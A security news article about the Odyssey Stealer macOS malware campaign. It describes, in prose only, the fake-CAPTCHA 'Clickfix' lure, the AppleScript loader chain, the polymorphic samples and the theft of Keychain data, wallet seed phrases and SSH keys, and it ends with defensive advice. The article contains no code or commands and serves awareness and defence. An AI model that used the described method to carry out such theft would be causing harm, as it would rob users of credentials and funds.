Odyssey Stealer: The Evolving Threat Targeting macOS Users Worldwide
A new and aggressive malware campaign known as Odyssey Stealer is currently targeting macOS users globally. This sophisticated threat has rapidly expanded its reach, compromising Apple computers and systematically stealing sensitive user data, including cryptocurrency wallets, login credentials, and personal documents.
Infection Methods and Initial Spread
Odyssey Stealer infiltrates systems through deceptive means, often masquerading as legitimate software updates, fake applications, or cracked tools available on untrustworthy websites. Once installed, it discreetly harvests critical information from web browsers like Chrome and Safari, as well as the macOS Keychain. The consequences are severe, ranging from immediate financial loss due to drained cryptocurrency accounts to long-term identity theft.
Security analysts at Moonlock Lab have observed a significant spike in Odyssey Stealer activity over recent days. Initially, infections were primarily reported in the United States, France, and Spain. However, within just twenty-four hours, the campaign aggressively expanded its reach to the United Kingdom, Germany, Italy, Canada, Brazil, India, and multiple nations across Africa and Asia. This rapid proliferation underscores the malware’s viral nature and the attackers’ coordinated efforts.
Advanced Evasion Techniques
One of the most alarming aspects of this new Odyssey Stealer campaign is its ability to evade traditional security defenses through automation. The malware samples analyzed in this wave appear to be auto-generated, a technique that creates a unique digital fingerprint, or hash, for every single infection instance. While the file size and malicious functionality remain identical, this polymorphism ensures that no two files look the same to antivirus scanners relying on static signatures.
By constantly altering its code structure, the malware renders standard blocklists ineffective. Security teams have observed numerous unique SHA256 hashes associated with this single campaign, complicating mitigation efforts. This level of sophistication suggests the attackers are using automated builders to mass-produce undetectable variants, allowing the threat to slip past defenses that would typically catch older, static versions of the stealer.
Technical Analysis of Odyssey Stealer
Odyssey Stealer is identified as a rebranded version of the previously known Poseidon Stealer, now emerging as a Malware-as-a-Service operation targeting macOS users. Its primary targets appear to be individuals involved in cryptocurrency and financial sectors, especially those in Western regions. The attack employs clever social engineering through a method called Clickfix, where victims are led to fake CAPTCHA verification pages that mimic legitimate services. When the user interacts with these pages, a terminal-based AppleScript is triggered, which initiates the download and execution of the malware. Unlike traditional infostealers, Odyssey has been built to extract a wide range of sensitive data—beyond just browser credentials. It seeks out session tokens, macOS Keychain entries, cryptocurrency wallet information, seed phrases, and even SSH keys, showing an evolved focus on financial espionage. The malware’s design is laced with stealth capabilities, including methods to persist on the system and evade detection, making it more dangerous and resilient than its predecessors.
Odyssey Stealer’s technical operation begins with an AppleScript that downloads and executes a shell script loader from a remote source. This loader then retrieves the main payload: an obfuscated binary designed to bypass debugging tools and forensic scrutiny. Once active, the malware systematically harvests a wide spectrum of information from the host device. It collects browser data, cryptocurrency wallet details, stored documents, system configuration files, and sensitive credentials from macOS Keychain. The malware is specially equipped to decrypt seed phrases from wallet apps, indicating a specific focus on targeting crypto users. The stolen data is compressed into archive files and sent to remote command-and-control servers for collection. The infrastructure used for data exfiltration appears to be strategically configured to avoid traditional security detection methods and includes servers registered through certain foreign IP services.
Implications for macOS Users
Odyssey Stealer demonstrates a significant leap in the evolution of macOS-targeted malware. Through refined social engineering tactics and technically sophisticated payload delivery, it effectively targets high-value users, especially those with financial assets stored on their machines. Its Clickfix method leverages user interaction to bypass traditional endpoint defenses, while its payload remains hidden through advanced evasion techniques. The malware’s ability to extract and decrypt wallet keys and seed phrases elevates the threat level for crypto investors. This campaign highlights how macOS is increasingly being targeted by financially motivated threat actors. Users and organizations are advised to enforce stricter controls around AppleScript execution, monitor system behavior for suspicious data compression and uploads, and adopt endpoint protection that includes heuristics for macOS environments.
Recommendations for Protection
To safeguard against Odyssey Stealer and similar threats, macOS users should adopt the following measures:
1. Download Software from Trusted Sources: Only obtain applications and updates from official websites or the Mac App Store to minimize the risk of downloading malicious software.
2. Exercise Caution with Terminal Commands: Avoid executing commands from unverified sources, especially those prompting you to paste code into the Terminal.
3. Implement Robust Security Solutions: Utilize comprehensive security software capable of detecting and preventing malware infections, including those employing advanced evasion techniques.
4. Regularly Update Systems: Keep your operating system and all installed applications up to date to patch vulnerabilities that could be exploited by malware.
5. Educate Yourself and Others: Stay informed about the latest cybersecurity threats and share this knowledge to foster a culture of security awareness.
By remaining vigilant and implementing these protective measures, macOS users can significantly reduce their risk of falling victim to Odyssey Stealer and other malicious campaigns.
